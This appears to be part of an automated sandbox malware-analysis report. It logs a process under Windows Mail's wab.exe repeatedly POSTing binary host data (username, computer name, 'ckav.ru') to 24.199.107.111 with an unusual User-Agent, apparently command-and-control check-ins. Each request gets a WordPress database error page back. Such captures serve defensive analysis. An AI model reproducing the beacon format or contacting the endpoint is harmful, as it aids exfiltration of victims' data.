                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 44 61 74 61 62 61 73 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 20 55 62 75 6e 74 75 2c 20 43 61 6e 74 61 72 65 6c 6c 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 65 6d 20 61 75 74 6f 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 32 65 6d 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 7d 0a 09 09 68 31 20 7b 0a 09 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 09 09 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 33 30 70 78 20 30 20 30 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 37 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 70 2c 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 2e 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 20 32 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c
                                                                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>Database Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 20px;}#error-page code {font-family: Consolas, Monaco,
                                                                              Apr 18, 2024 21:16:01.455970049 CEST1289INData Raw: 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 6c 20 6c 69 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09
                                                                              Data Ascii: monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid trans
                                                                              Apr 18, 2024 21:16:01.455988884 CEST115INData Raw: 22 65 72 72 6f 72 2d 70 61 67 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 22 3e 3c 68 31 3e 45 72 72 6f 72 20 65 73 74 61 62 6c 69 73 68 69 6e 67 20 61 20 64 61 74 61 62 61 73 65 20 63 6f 6e 6e 65
                                                                              Data Ascii: "error-page"><div class="wp-die-message"><h1>Error establishing a database connection</h1></div></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              54192.168.2.54977424.199.107.111805496C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Apr 18, 2024 21:16:01.755192041 CEST246OUTPOST /index.php/927339792 HTTP/1.0
                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                              Host: 24.199.107.111
                                                                              Accept: */*
                                                                              Content-Type: application/octet-stream
                                                                              Content-Encoding: binary
                                                                              Content-Key: F4173C58
                                                                              Content-Length: 153
                                                                              Connection: close
                                                                              Apr 18, 2024 21:16:01.917861938 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 36 00 32 00 32 00 35 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                              Data Ascii: (ckav.rualfons562258ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                              Apr 18, 2024 21:16:02.759351015 CEST1289INHTTP/1.0 500 Internal Server Error
                                                                              Date: Thu, 18 Apr 2024 19:16:01 GMT
                                                                              Server: Apache/2.4.59 (Debian)
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              Content-Length: 2412
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 44 61 74 61 62 61 73 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 20 55 62 75 6e 74 75 2c 20 43 61 6e 74 61 72 65 6c 6c 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 65 6d 20 61 75 74 6f 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 32 65 6d 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 7d 0a 09 09 68 31 20 7b 0a 09 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 09 09 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 33 30 70 78 20 30 20 30 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 37 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 70 2c 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 2e 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 20 32 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c
                                                                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>Database Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 20px;}#error-page code {font-family: Consolas, Monaco,
                                                                              Apr 18, 2024 21:16:02.759387016 CEST1289INData Raw: 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 6c 20 6c 69 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09
                                                                              Data Ascii: monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid trans
                                                                              Apr 18, 2024 21:16:02.759407997 CEST115INData Raw: 22 65 72 72 6f 72 2d 70 61 67 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 22 3e 3c 68 31 3e 45 72 72 6f 72 20 65 73 74 61 62 6c 69 73 68 69 6e 67 20 61 20 64 61 74 61 62 61 73 65 20 63 6f 6e 6e 65
                                                                              Data Ascii: "error-page"><div class="wp-die-message"><h1>Error establishing a database connection</h1></div></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              55192.168.2.54977524.199.107.111805496C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Apr 18, 2024 21:16:03.069976091 CEST246OUTPOST /index.php/927339792 HTTP/1.0
                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                              Host: 24.199.107.111
                                                                              Accept: */*
                                                                              Content-Type: application/octet-stream
                                                                              Content-Encoding: binary
                                                                              Content-Key: F4173C58
                                                                              Content-Length: 153
                                                                              Connection: close
                                                                              Apr 18, 2024 21:16:03.232758045 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 36 00 32 00 32 00 35 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                              Data Ascii: (ckav.rualfons562258ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                              Apr 18, 2024 21:16:04.054766893 CEST1289INHTTP/1.0 500 Internal Server Error
                                                                              Date: Thu, 18 Apr 2024 19:16:03 GMT
                                                                              Server: Apache/2.4.59 (Debian)
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              Content-Length: 2412
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 44 61 74 61 62 61 73 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 20 55 62 75 6e 74 75 2c 20 43 61 6e 74 61 72 65 6c 6c 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 65 6d 20 61 75 74 6f 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 32 65 6d 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 7d 0a 09 09 68 31 20 7b 0a 09 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 09 09 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 33 30 70 78 20 30 20 30 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 37 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 70 2c 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 2e 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 20 32 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c
                                                                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>Database Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 20px;}#error-page code {font-family: Consolas, Monaco,
                                                                              Apr 18, 2024 21:16:04.054825068 CEST1289INData Raw: 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 6c 20 6c 69 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09
                                                                              Data Ascii: monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid trans
                                                                              Apr 18, 2024 21:16:04.054843903 CEST115INData Raw: 22 65 72 72 6f 72 2d 70 61 67 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 22 3e 3c 68 31 3e 45 72 72 6f 72 20 65 73 74 61 62 6c 69 73 68 69 6e 67 20 61 20 64 61 74 61 62 61 73 65 20 63 6f 6e 6e 65
                                                                              Data Ascii: "error-page"><div class="wp-die-message"><h1>Error establishing a database connection</h1></div></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              56192.168.2.54977624.199.107.111805496C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Apr 18, 2024 21:16:04.366647959 CEST246OUTPOST /index.php/927339792 HTTP/1.0
                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                              Host: 24.199.107.111
                                                                              Accept: */*
                                                                              Content-Type: application/octet-stream
                                                                              Content-Encoding: binary
                                                                              Content-Key: F4173C58
                                                                              Content-Length: 153
                                                                              Connection: close
                                                                              Apr 18, 2024 21:16:04.529144049 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 36 00 32 00 32 00 35 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                              Data Ascii: (ckav.rualfons562258ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                              Apr 18, 2024 21:16:05.395215988 CEST1289INHTTP/1.0 500 Internal Server Error
                                                                              Date: Thu, 18 Apr 2024 19:16:04 GMT
                                                                              Server: Apache/2.4.59 (Debian)
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              Content-Length: 2412
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 44 61 74 61 62 61 73 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 20 55 62 75 6e 74 75 2c 20 43 61 6e 74 61 72 65 6c 6c 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 65 6d 20 61 75 74 6f 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 32 65 6d 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 7d 0a 09 09 68 31 20 7b 0a 09 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 09 09 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 33 30 70 78 20 30 20 30 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 37 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 70 2c 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 2e 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 20 32 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c
